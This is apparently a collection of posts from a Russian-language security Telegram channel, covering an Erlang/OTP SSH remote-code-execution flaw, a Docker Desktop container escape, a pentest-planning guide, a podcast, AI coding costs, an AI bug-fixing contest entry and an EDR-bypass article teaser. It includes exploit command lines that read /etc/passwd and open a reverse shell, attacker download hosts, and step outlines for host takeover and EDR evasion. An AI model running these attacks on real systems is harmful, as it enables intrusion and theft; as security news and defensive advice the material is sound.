CVE-2025-32433: RCE в Erlang/OTP SSH
#CVE #RCE #SSH #erlang #IoT

Обнаружена критическая уязвимость в SSH-демоне Erlang/OTP с максимально возможным CVSS 10.0, которая активно эксплуатируется в дикой природе. Атакующие могут выполнять произвольный код без аутентификации, отправляя SSH_MSG_CHANNEL_REQUEST сообщения до завершения процедуры входа.

➡️Что такое Erlang/OTP SSH
Erlang/OTP - это платформа для создания распределенных систем, которая включает собственную реализацию SSH-сервера. Эта реализация используется в телекоммуникационном оборудовании, IoT-устройствах и промышленных системах, где требуется надежная связь между узлами.

➡️Exploit <прикрепленный файл>

Запуск

python cve-2025-32433.py <host> [options]

Чекер

python cve-2025-32433.py 127.0.0.1 --check

Выполнение команд

python cve-2025-32433.py 127.0.0.1 --c 'cat /etc/passwd'

Прокидывание reverse shell'а

python cve-2025-32433.py 127.0.0.1 --shell --lhost 192.168.1.100 --lport 4444

➡️Активная эксплуатация
TXOne Networks зафиксировала три различные кампании с апреля 2025 года:
Кампания 1 (Нидерланды): Загрузка bash-скрипта с yaso[.]su, очистка истории команд для сокрытия следов
Кампания 2 (Великобритания): Загрузка бинарного файла с 107.150.0[.]103, оставление маркера "hello_cve_2025_32433"
Кампания 3 (США): Мультиархитектурный ботнет с поддержкой x86_64 и i586, загрузка с 196.251.66[.]32

➡️Затронутые версии
- OTP-25 до 25.3.2.20
- OTP-26 до 26.2.5.11
- OTP-27 до 27.3.3

➡️Защитные меры
Немедленное обновление до исправленных версий - единственный надежный способ защиты. Временно можно отключить SSH-компонент Erlang/OTP или ограничить доступ к порту 22 через файрвол.

➡️Проверка на компрометацию

# Поиск подозрительных процессов
ps aux | grep -E "(yaso|hello_cve|top1miku)"

# Проверка сетевых соединений
netstat -an | grep :22

# Анализ логов SSH
journalctl -u ssh | grep -i erlang

🔗Дополнительная информация:
- TXOne Networks
- Exploit

🌚 @poxek | 🌚 Блог | 📺 YT | 📺 RT | 📺 VK

➡️CVE-2025-9074: Escape from Tarkov Docker Desktop

Разбираем свежий крит в Docker Desktop для Windows и macOS, которая позволяет контейнерам полностью похекать хостовую систему.

➡️Суть проблемы

CVE-2025-9074 (CVSS 9.3) - это container escape уязвимость в Docker Desktop, исправленная в версии 4.44.3. Проблема в том, что любой контейнер может подключиться к Docker Engine API по адресу 192.168.65.7:2375 без какой-либо аутентификации.

➡️Механизм атаки

Исследователь Felix Boulet показал, что эксплуатация тривиальна:
Шаг 1: POST-запрос к /containers/create с JSON payload, который монтирует диск C:\ хоста в папку контейнера /mnt/host/c:/host_root
Шаг 2: POST-запрос к /containers/{id}/start для запуска контейнера с полным доступом к файловой системе хоста
Результат: Полная компрометация хоста с правами администратора

➡️Различия по платформам

Windows: Контейнер получает полный доступ к файловой системе, может читать любые файлы, перезаписывать системные DLL и эскалировать привилегии до администратора.
macOS: Docker Desktop имеет дополнительный слой изоляции, монтирование пользовательских директорий требует разрешения. Но злоумышленник все равно получает полный контроль над Docker и может бэкдорить конфигурацию приложения.
Linux: Буква ю - .... Использует named pipe вместо TCP-сокета для API. Линь снова оказалась самой безопасной ОСью))

➡️Альтернативные векторы атаки

Помимо вредоносного контейнера, уязвимость можно эксплуатировать через SSRF:
- Если приложение позволяет проксировать HTTP-запросы
- Особенно опасно, если SSRF поддерживает POST/PATCH/DELETE методы
- Можно достучаться до Docker socket через уязвимое приложение

➡️Техническая суть

По словам исследователя Philippe Dugre (zer0x64), это была "простая недоработка" - внутренний HTTP API Docker был доступен из любого контейнера без аутентификации или контроля доступа.
Enhanced Container Isolation (ECI) не защищает от этой уязвимости, что делает её особенно опасной.

➡️Меры защиты

Немедленно: Обновиться до Docker Desktop 4.44.3+
Проверка версии: docker --version
Мониторинг: Отслеживать подозрительные HTTP-запросы к 192.168.65.7:2375
Аудит: Проверить контейнеры на наличие подозрительных примонтированных дисков

🔗Источники:
- HackerNews
- NIST

🌚 @poxek | 🌚 Блог | 📺 YT | 📺 RT | 📺 VK

[В закладки] Гайд по составлению ТЗ для внутреннего пентеста
#AD #pentest

С виду все просто: дали пентестерам доступ в сеть, они пошарились по серверам, нашли пару уязвимостей, написали отчет. Профит. Но на деле плохо подготовленная проверка легко превращается в хаотичный квест с непредсказуемым финалом.

В лучшем случае вы получите бесполезный список из сотни мелких «дыр» в принтерах и кофемашинах. В худшем — пентестеры случайно обрушат производственную линию или устроят DDoS на Active Directory. А между этими крайностями лежит целый спектр проблем: от юридических рисков, если в документе не очертить скоуп и команда выйдет за рамки дозволенного, до банального несовпадения ожиданий и результатов.

Однако всех этих неприятностей легко избежать, если подойти к планированию внутреннего пентеста основательно. В этой статье разберем, почему техническое задание — не формальность, а жизненно важный документ, и покажем, как его правильно составить. Кто-то возразит, что это утопия, и в реальности все работают иначе, но нам бы хотелось это изменить. Поверьте: оно того стоит.

🔗Читать дальше

🌚 @poxek | 🌚 Блог | 📺 YT | 📺 RT | 📺 VK

Сегодня у меня в гостях Владимир Иванов — основатель @ScanFactory и бывший пентестер, который решил автоматизировать то, что раньше делал руками. ScanFactory - это платформа автоматизированного пентеста, которая за короткое время смогла завоевать доверие российского рынка кибербеза. Сегодня с Владимиром разбираем, как превратить экспертизу пентестера в масштабируемый продукт, какую роль играет ИИ в современных сканерах уязвимостей и почему автоматизация не заменит, а дополнит человеческую экспертизу.
#подкаст

Подкаст будет интересен:
➡️Пентестерам
➡️Владельцам бизнеса
➡️Всем, кто хочет узнать больше о применении нейросетей для пентеста
➡️Тем, кто ждёт когда же людей заменит ИИ

В этом подкасте мы обсудили:
➡️Как поменялся рынок кибербеза в России за последние 15, 10, 5 лет
➡️Откуда и как возникают идеи о создании собственной компании
➡️Про карьерный рост пентестера и что он не видит, пока не начинает делать своё детище
➡️Как же создать свой продукт и не закрыться в первый год
➡️С какими сложностями можно столкнуться при создании своего сканера уязвимостей

🔗Ссылки:
💬 Слушать в Telegram
📹 YouTube
📺 RuTube
💙 VK Видео
🎵 Apple Podcasts
🎵 Яндекс.Музыка
🔤 Mave

Обязательно смотрите до конца!

🌚 @poxek | 🌚 Блог | 📺 YT | 📺 RT | 📺 VK

Взял свой расход из Cursor и переложил это кол-во токенов на API Anthropic, вышли такие цифры:
➡️Claude 4.1 Opus Thinking (55.4M токенов): 55.4M * ($15+$75)/2 / 1M = $2493
➡️Claude 4 Sonnet Thinking (186.1M токенов): 186.1M * ($3+$15)/2 / 1M = $1674.9

Вывод: если я подключусь напрямую к API, то потрачу в 20 раз больше денег и точно буду бомжом вайб кодером

Из очевидных идей по оптимизации что я думал и предложили умные люди из чата: это не использовать всегда самые дорогие модели. А делать фиксы, обдумывать логику приложения, делать мелкие исправления/доработки используя более дешевые модели. А какой-то супер сложный функционал или задачи над которыми тупят более слабые модели, уже поручать той же Opus 4.1. Тогда экономия будет на лицо и на Usage вашего аккаунта.

Второй момент, что у меня очень большие cursor rules используются, один что-то порядка 900 слов, второй на 200-300 слов. И у них стоит Always apply. С одной стороны скажите дурак, у тебя дофига токенов сжигается так с каждым запросом. С другой стороны, у меня стабильно классный код пишется, причем вне зависимости от задачи, он всегда с правильной архитектурой, файловой структурой и т.д. Поэтому отказываться от cursor rules я точно не буду, но вот сократить их содержание думаю стоит.

Люди также пишут, что эти модели быстро запутываются. Я не согласен, у меня даже без использования Memory они не забывают практически ничего или сами недостающую информацию грепают по коду или спрашивают у меня.

Пока изучаю аналоги Cursor в лицах Kiro, Windsurf, Qoder. Мне важно, чтобы там также были доступны модели от Anthropic, чтобы сохранить тоже качество кода, даже если сама IDE будет менее функциональной или визуально не привлекательной.

P.s. добавлю, что все эти эксперименты и проекты я оплачиваю из своего кармана, а не компания оплачивает. Поэтому вопрос денег всегда будет стоять ребром ))

Затонувший континент, который научился чинить баги лучше людей - Atlantis.

Представьте ИИ, который берёт 54 миллиона строк кода, погружается в них и находит баги, пока вы спите. Звучит как фантастика? Нет - это команда Atlantis, победитель DARPA AIxCC.

Ранее вы видели интересный разбор Roboduck - инструмента с агентами для AppSec. Но Atlantis идёт дальше. Он доказал: ИИ реально умеет закрывать уязвимости почти как профи. Как профессиональный бариста, готовящий кофе по рецепту - почти безупречно, но иногда капля не туда.

Atlantis — это не одна монолитная система, а целый ансамбль систем. Несколько независимых агентов решают одну задачу, и их ошибки сглаживаются друг другом. Внутри есть агенты для C и Java, модули для фаззинга, патч-агенты, которые сами генерируют исправления, и сервис для красивых отчётов в SARIF.

Как работает система? Находит баг, система передаёт контекст, патч-агент предлагает исправление, код пересобирается, проверяется - и, если баг ушёл, фикс идёт в отчёт. Всё это масштабируется в облаках на Azure через Kubernetes. И да, бюджет был ограничен: из 💵50k на LLM 💵29k ушли на Patch-агенты и агенты которые работали с несколькими языками. Много кушает, но работает эффективно.

Агенты в этом случае не заменяют фаззинг — они его прокачивают📦. Они помогали создавать «обёртки» для функций, чтобы фаззер мог тестировать код, подсказывали уязвимые места и сами предлагали исправления. Классические методы брали на себя тяжёлую работу, проверяя каждую строчку.

Результат достаточно интересный: найдено 77 % багов, исправлено 61 %. Из патч-агентов: Мультиязычный — 69,2 %, C — 16,8 %, Java — 14 %.

Особая фишка — BGA (Blob Generation Agent), который не просто придумывал данные для фаззера, а создавал эксплойты, которые превращались в словари для поиска уязвимостей. Нулевые дни спрятались от страха в пыльном деревянном шкафу после этой новости.

Было и весело, и страшно. Один из компонентов ломался, если в пути встречалось слово «fuzz». На тестах всё ок, а на финале пайплайн встал. Починили буквально за пару часов до дедлайна. А ночные баги системы в Kubernetes-инфрастурктуре заставляли команду ловить ошибки в режиме ниндзя.

Сейчас такие проекты показывают, что ближайшее будущее AppSec - за гибридными системами. Когда интеллект человека, сила LLM и проверенные классические техники объединяются, баги уходят быстрее, точнее и надёжнее, чем когда-либо. И, честно говоря, это только начало.

UNDERCONF 2
#ивент #конфа

Снова проводиться андеграундная конференция UNDERCONF. В прошлом году оно мне запомнилось атмосферными ретро компами и играми на них, хорошие доклады и очень классный мерчпак для спикеров. CFP в этом году снова был закрытым.

📍Город: Москва
📆Дата: 28 сентября (воскресенье)
🔖Программа доклада:
08:30 — открытие конференции, спонсорская презентация
09:00 — @reex — секретный доклад
10:00 — @Ahteesh0 — Реверсь своих, чтоб другим неповадно было: шифруем прошивку на SOC RK35* без NDA
11:00 — @deadroot — 0-day SSTI→RCE @laravel* и анархия
12:00 — @Michaelzhm — Отключение AV или самый грязный способ деплоя mimikatz
13:00 — Перерыв
14:00 — Дебаты
15:00 — @dlinyj — секретный доклад
16:00 — @Bam_hack — Эксплойты для мозга, реверс мошеннических скриптов
17:00 — @SooLFaa — секретный доклад
18:00 — @in7egral — 30 лет применения криптографии для защиты цифровых секретов. Итоги
19:00 — @scan87 — секретный доклад
20:00 — Закрытие конференции

💵Билеты: в этом году платные, но стоят от 3к рублей
‼️Но организаторы подогнали мне 30 билетов на эту замечательную конференцию
❗️Условия: быть подписанным на @poxek и быть участником @poxek_chat. Розыгрыш до 10 сентября!

🌚 @poxek

Глушилка для EDR. Обходим механизмы безопасности через Windows Filtering Platform
#EDR #Windows #Microsoft #AD #bypass

В этой статье я покажу вектор таргетированной атаки на трафик между EDR/XDR и сервером SOC. Через Bring Your Own Vulnerable Driver пропатчим Driver Signature Enforcement ядра Windows, после чего загрузим свой неподписанный драйвер Windows Filtering Platform, чистый по сигнатурам.

На осно­ве драй­вера мы под­нимем проз­рачный прок­си, который будет перех­ватывать и собирать тра­фик меж­ду аген­том и сер­вером. Это поз­волит обой­ти защиту, отве­чающую за хра­нение чувс­тви­тель­ных дан­ных про­филя бра­узе­ра и кон­троль одно­разо­вых сес­сий. Под­робнос­ти про обход DSE ты можешь про­честь в мо­ем иссле­дова­нии.

По­мимо пря­мой борь­бы с EDR с помощью передо­вых методов вре­донос­ного ПО, сущес­тву­ют аль­тер­натив­ные спо­собы обхо­да, такие как исполь­зование неп­равиль­ных нас­тро­ек или уяз­вимос­тей EDR, уда­ление аген­та EDR или исполь­зование уяз­вимого драй­вера (Bring Your Own Vulnerable Driver, BYOVD), который при­бива­ет про­цес­сы аген­тов EDR. Сре­ди этих кос­венных методов обхо­да осо­бен­но инте­рес­ны те, что осно­ваны на сетевых под­клю­чени­ях.

🔗Читать дальше

🌚 @poxek | 🌚 Блог | 📺 YT | 📺 RT | 📺 VK